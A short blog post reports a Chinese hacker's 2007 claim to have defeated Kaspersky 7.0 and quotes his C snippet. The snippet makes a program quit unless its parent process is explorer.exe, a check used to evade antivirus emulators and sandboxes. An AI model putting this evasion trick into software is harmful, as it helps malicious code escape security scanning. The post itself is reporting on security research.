The Dark Visitor

Chinese hacker xyzreg claims to have broken Kaspersky Anti-Virus Technology

卡巴最新查毒技术被中国黑客攻破

        In the headlines on Hackbase, one of China’s largest hacker websites, claims are being made that a Chinese hacker/researcher named xyzreg has broken Kaspersky’s newest anit-virus technology. His announcement was made at the Chinese 2007 Security Focus Summit. During the summit he demonstrated how to penetrate the security software defenses of Kaspersky, Norton and McAfee. He has posted the method for breaking Kaspersky 7.0 on his blog.

More details as I can find them.

UPDATE: Found xyzreg’s blog. I will post the information but please remember I am just a linguist and this might as well be in Chinese…wait…anyway here is what he posted:

[2007/11/09 13:46 | by xyzreg ]

It only took me several lines (10 or so) of code and I broke it, it didn’t even take all my skill.

DWORD fpid,epid;
void VMM()
{
PROCESSENTRY32 pe;
HANDLE hkz=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if (Process32First(hkz,&pe))
{
do
{
if (pe.th32ProcessID==GetCurrentProcessId())
{
fpid=pe.th32ParentProcessID;
}
if (stricmp(pe.szExeFile,”explorer.exe”)==0)
{
epid=pe.th32ProcessID;
}
}
while(Process32Next(hkz,&pe));
}
}
Main Function:
VMM();
if(fpid!=epid)
return 0;
You don’t understand? Then don’t look at it. It’s common sense, common sense…

UPDATE: The real name of xyzreg appears to be 张翼(Zhang Yi).

MORE UPDATES: Zhang Yi attended the Xcon 2007 Conference that I was at in 2006.